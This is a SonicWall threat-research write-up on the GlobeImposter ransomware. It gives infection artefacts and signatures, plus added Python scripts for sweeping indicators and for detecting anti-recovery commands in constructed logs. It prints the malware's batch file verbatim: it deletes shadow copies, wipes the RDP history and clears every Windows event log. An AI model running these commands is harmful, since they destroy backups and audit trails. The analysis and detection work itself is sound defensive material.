SonicWall Security Center


GlobeImposter Ransomware renders system unbootable (Nov 10, 2017)



Description


The SonicWall Capture Labs Threat Research Team has come across ransomware that goes by the name GlobeImposter. It is also known as Fake Globe. GlobeImposter is distributed via a malicious spam campaign and, as with all ransomware, encrypts the victim's files, making them unrecoverable without payment. Most ransomware has a built-in file extension filter that leaves executable files intact. This ransomware, however, encrypts executable files as well and, as a result, renders the system unbootable.

Infection Cycle:

Upon execution the Trojan makes the following changes to the filesystem and begins its file encryption process:

  • copies itself to %APPDATA%\{original_filename}.exe [Detected as GAV: GlobeImposter.A (Trojan)]
  • creates %ALLUSERSPROFILE%\60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE
  • encrypts files and gives them a .TRUE file extension
  • drops how_to_back_files.html into every directory containing encrypted files

how_to_back_files.html contains the following html page:

The page contains data on steps needed to recover files. We wrote to true_offensive@aol.com and received the following reply:

If %ALLUSERSPROFILE%\60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE already exists, the trojan ceases all operations and exits.
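The filesystem artefacts listed above (the .TRUE extension, the how_to_back_files.html note and the fixed-name marker file under %ALLUSERSPROFILE%) are what an incident responder would sweep a suspect machine for. The following Python script is an added example, not SonicWall's tooling: it walks a directory tree for those indicators and reports a verdict. The sample tree it builds in a temporary directory is constructed for the demonstration; on a real host you would point scan_tree at the user profile directories and marker_present at the real %ALLUSERSPROFILE% path.

```python
import os
import shutil
import tempfile
from pathlib import Path

# Indicators taken from the write-up above.
ENCRYPTED_EXT = ".TRUE"
RANSOM_NOTE = "how_to_back_files.html"
MARKER_NAME = "60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE"


def scan_tree(root):
    """Walk `root` and collect encrypted files and dropped ransom notes."""
    findings = {"encrypted": [], "notes": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            # The Trojan appends .TRUE to the original name (report.docx -> report.docx.TRUE).
            if name.upper().endswith(ENCRYPTED_EXT):
                findings["encrypted"].append(path)
            elif name.lower() == RANSOM_NOTE:
                findings["notes"].append(path)
    return findings


def marker_present(allusersprofile):
    """True if the fixed-name marker file the Trojan creates exists under the given profile dir."""
    return os.path.isfile(os.path.join(allusersprofile, MARKER_NAME))


def summarize(base):
    """Combine the file sweep and the marker check into one triage result.

    `base` is assumed to contain a Users/ tree and a ProgramData/ directory
    (the layout build_sample_tree() creates)."""
    found = scan_tree(os.path.join(base, "Users"))
    marker = marker_present(os.path.join(base, "ProgramData"))
    affected = sorted({os.path.dirname(p) for p in found["encrypted"]})
    return {
        "encrypted_count": len(found["encrypted"]),
        "note_count": len(found["notes"]),
        "marker_present": marker,
        "affected_dirs": affected,
        "verdict": "infected" if (marker or found["encrypted"]) else "clean",
    }


def build_sample_tree():
    """Constructed demo layout (hypothetical victim data), not a real infected host."""
    base = Path(tempfile.mkdtemp(prefix="globeimposter_demo_"))
    docs = base / "Users" / "victim" / "Documents"
    docs.mkdir(parents=True)
    (docs / "report.docx.TRUE").write_bytes(b"\x00" * 16)
    (docs / "budget.xlsx.TRUE").write_bytes(b"\x00" * 16)
    (docs / RANSOM_NOTE).write_text("<html>constructed placeholder note</html>")
    pics = base / "Users" / "victim" / "Pictures"
    pics.mkdir()
    (pics / "holiday.jpg").write_bytes(b"\xff\xd8\xff")  # untouched file, must not be flagged
    prog = base / "ProgramData"                           # stands in for %ALLUSERSPROFILE%
    prog.mkdir()
    (prog / MARKER_NAME).write_text("constructed marker content")
    return str(base)


def cleanup(base):
    shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    demo = build_sample_tree()
    print(summarize(demo))
    cleanup(demo)
```

The sweep deliberately reports affected directories separately from the note count: a directory with .TRUE files but no how_to_back_files.html is worth a second look, since the note is dropped into every directory the Trojan touches.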

60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE contains the following data:

After encrypting files (including .exe files), the Trojan then performs operations to make file restoration difficult. It even clears Windows event logs and removes any saved remote desktop configurations. The following .bat file performs this task before being deleted.

      @echo off
      vssadmin.exe Delete Shadows /All /Quiet
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
      cd %userprofile%\documents\
      attrib Default.rdp -s -h
      del Default.rdp
      for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
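The batch file above is a compact anti-recovery sequence: shadow copy deletion, wiping of saved RDP connection history, removal of Default.rdp and clearing of every Windows event log. Each step is visible as a process creation with a distinctive command line, so a detection that correlates several of them on one host inside a short window is far more specific than alerting on any one of them (administrators do run vssadmin and wevtutil legitimately). The Python below is an added example, not SonicWall's signature logic; the pipe-separated process-creation records it parses are a constructed stand-in for Sysmon or Security 4688 telemetry, and the host names and timestamps are invented.

```python
import re
from datetime import datetime, timedelta

# Detection rules for the steps in the dropped batch file.
# Each rule is (technique name, regex applied to the process command line).
RULES = [
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("event_log_clearing", re.compile(r"wevtutil(\.exe)?\s+cl\b", re.I)),
    ("rdp_history_wipe", re.compile(
        r'reg(\.exe)?\s+delete\s+"?HK(EY_CURRENT_USER|CU)\\Software\\Microsoft\\Terminal Server Client', re.I)),
    ("rdp_default_removal", re.compile(r"\b(attrib|del)\b.*Default\.rdp", re.I)),
]

# Constructed records: timestamp|host|parent process|command line. Not real telemetry.
# Lines 1-4 mirror the batch file; lines 5-6 are benign administrative use that must not alert.
SAMPLE_LOG = r"""2017-11-10T09:14:02Z|WS-042|cmd.exe|vssadmin.exe Delete Shadows /All /Quiet
2017-11-10T09:14:02Z|WS-042|cmd.exe|reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
2017-11-10T09:14:03Z|WS-042|cmd.exe|del Default.rdp
2017-11-10T09:14:05Z|WS-042|cmd.exe|wevtutil.exe cl "Security"
2017-11-10T09:30:11Z|WS-017|explorer.exe|wevtutil.exe qe Application /c:5
2017-11-10T11:02:45Z|WS-017|powershell.exe|vssadmin.exe list shadows
"""


def parse_line(line):
    """Split one constructed record into its fields; the command line may itself contain '|'."""
    ts, host, parent, cmdline = line.split("|", 3)
    return {"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host, "parent": parent, "cmdline": cmdline}


def match_rules(cmdline):
    """Names of every rule whose pattern appears in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def detect(log_text, window=timedelta(seconds=60), min_techniques=2):
    """Raise one alert per host on which at least `min_techniques` distinct
    anti-recovery techniques occur within `window` of each other."""
    by_host = {}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        hits = match_rules(ev["cmdline"])
        if hits:
            ev["techniques"] = hits
            by_host.setdefault(ev["host"], []).append(ev)

    alerts = []
    for host, events in by_host.items():
        events.sort(key=lambda e: e["time"])
        for i, first in enumerate(events):
            seen = set()
            for ev in events[i:]:
                if ev["time"] - first["time"] > window:
                    break
                seen.update(ev["techniques"])
            if len(seen) >= min_techniques:
                alerts.append({"host": host,
                               "start": first["time"].isoformat(),
                               "techniques": sorted(seen)})
                break  # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The correlation window is the important design choice: `vssadmin list shadows` or `wevtutil qe` on WS-017 match nothing, and even a lone `wevtutil cl` would need a second technique on the same host within a minute before the rule fires, which keeps the alert tied to the wiper sequence rather than to routine maintenance.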

Since the Trojan encrypts critical system files, it renders the machine unbootable:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Globeimposter.RSM (Trojan)
  • GAV: Globeimposter.RSM_2 (Trojan)
  • GAV: Globeimposter.RSM_3 (Trojan)
  • GAV: Globeimposter.RSM_4 (Trojan)



© 2017 SonicWall